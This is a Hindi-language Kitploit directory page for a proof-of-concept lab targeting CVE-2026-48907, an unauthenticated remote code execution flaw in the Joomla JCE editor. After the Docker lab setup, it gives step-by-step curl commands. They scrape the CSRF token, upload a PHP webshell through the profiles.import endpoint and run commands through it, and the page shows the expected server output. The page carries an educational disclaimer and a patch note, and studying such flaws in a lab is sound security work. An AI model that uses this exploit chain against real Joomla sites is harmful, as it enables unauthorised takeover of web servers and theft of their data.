Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-48907 — CVE-2026-48907 के लिए POC | Kitploit
उपकरण/GitHubGitHub/pssec-io/cve-2026-48907
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंटलैब और अभ्यास
GitHubpssec-io/cve-2026-48907

CVE-2026-48907

CVE-2026-48907 के लिए POC

रिपॉजिटरी देखें
11 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-48907 — Joomla JCE बिना प्रमाणीकरण RCE लैब

PSsec CVE-2026-48907 के लिए शैक्षिक सुरक्षा अनुसंधान लैब।


अवलोकन

CVE-2026-48907 एक गंभीर (CVSS 10.0) बिना प्रमाणीकरण वाली रिमोट कोड निष्पादन भेद्यता है, जो JCE (Joomla Content Editor) में है, जो Joomla के लिए सबसे व्यापक रूप से स्थापित संपादक एक्सटेंशन है, और सभी संस्करणों ≤ 2.9.99.4 को प्रभावित करती है।

profiles.import एंडपॉइंट बिना किसी प्रमाणीकरण के फ़ाइल अपलोड स्वीकार करता है। एक हमलावर XML प्रोफ़ाइल के रूप में छिपी हुई दुर्भावनापूर्ण PHP फ़ाइल अपलोड कर सकता है, जो सर्वर की tmp/ निर्देशिका में लिखी जाती है और HTTP के माध्यम से सीधे निष्पादित होती है — कोई क्रेडेंशियल आवश्यक नहीं है।

विवरणमान
CVECVE-2026-48907
CVSS स्कोर10.0 गंभीर
प्रभावित संस्करणJCE ≤ 2.9.99.4
ठीक किए गए संस्करणJCE ≥ 2.9.99.5
CISA KEV सूचीबद्धहाँ — 16 जून, 2026
सक्रिय रूप से शोषितहाँ

लैब सेटअप

पूर्वापेक्षाएँ

  • Docker + Docker Compose
  • Kali Linux (या कोई भी Linux होस्ट)

1. असुरक्षित वातावरण प्रारंभ करें

root@kitploit:~
docker compose up -d

2. Joomla इंस्टॉलर पूरा करें

अपने ब्राउज़र में http://localhost:8080 खोलें और इन क्रेडेंशियल्स का उपयोग करके सेटअप विज़ार्ड पूरा करें:

फ़ील्डमान
डेटाबेस होस्टdb
डेटाबेस नामjoomla
डेटाबेस उपयोगकर्ताjoomla
डेटाबेस पासवर्ड

3. असुरक्षित JCE एक्सटेंशन इंस्टॉल करें

root@kitploit:~
wget https://github.com/widgetfactory/jce/releases/download/2.9.99.4/pkg_jce_29994.zip

फिर Joomla Admin में System → Extensions → Install → ZIP अपलोड करें।


शोषण

4. CSRF टोकन और सत्र कुकी निकालें

root@kitploit:~
URL=http://localhost:8080
TOKEN=$(curl -s -c cookies.txt "$URL/" \
  | sed -n 's/.*"csrf\.token"[[:space:]]*:[[:space:]]*"\([a-f0-9]\{32\}\)".*/\1/p; s/.*name="\([a-f0-9]\{32\}\)"[^>]*value="1".*/\1/p' \
  | head -n1)

5. बिना प्रमाणीकरण प्रोफ़ाइल आयात के माध्यम से PHP वेबशेल अपलोड करें

root@kitploit:~
curl -i -s -b cookies.txt -c cookies.txt \
  -F "[email protected];type=application/xml" \
  -F "task=profiles.import" \
  -F "${TOKEN}=1" \
  "$URL/index.php?option=com_jce"

6. रिमोट कोड निष्पादन सत्यापित करें

root@kitploit:~
curl -i -s -b cookies.txt -c cookies.txt \
  "$URL/tmp/shell.xml.php?cmd=id"

अपेक्षित आउटपुट: uid=33(www-data) gid=33(www-data)


फ़ाइलें

फ़ाइलविवरण
docker-compose.ymlअसुरक्षित Joomla 5.3.1 + MySQL 8.0 तैयार करता है
shell.xml.phpन्यूनतम PHP वेबशेल पेलोड
instructions.txtचरण-दर-चरण शोषण नोट्स

सुधार

JCE को तुरंत संस्करण 2.9.99.5 या बाद के संस्करण में अपडेट करें।

पुराने Joomla संस्करणों के लिए आधिकारिक विक्रेता सलाह और निःशुल्क पैच: JCE Security Update — joomlacontenteditor.net


श्रेय

  • एक्सप्लॉइट टूलिंग संदर्भ: JoomlaSniper by ynsmroztas
  • भेद्यता mySites.guru के Phil Taylor द्वारा वास्तविक दुनिया में खोजी गई।
  • CISA KEV सूची: 16 जून, 2026

अस्वीकरण

यह रिपॉजिटरी केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए है।

परीक्षण केवल उन प्रणालियों पर किया जाना चाहिए जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है। उन प्रणालियों के विरुद्ध इस सामग्री का अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं, अवैध और अनैतिक है। लेखक और Pansophical OU इस सामग्री के दुरुपयोग के लिए कोई दायित्व स्वीकार नहीं करते हैं।

यह लैब वातावरण जानबूझकर असुरक्षित है। इसे इंटरनेट या किसी भी अविश्वसनीय नेटवर्क पर एक्सपोज़ न करें।


PSsec द्वारा

टूल डाउनलोड करें
joomlapass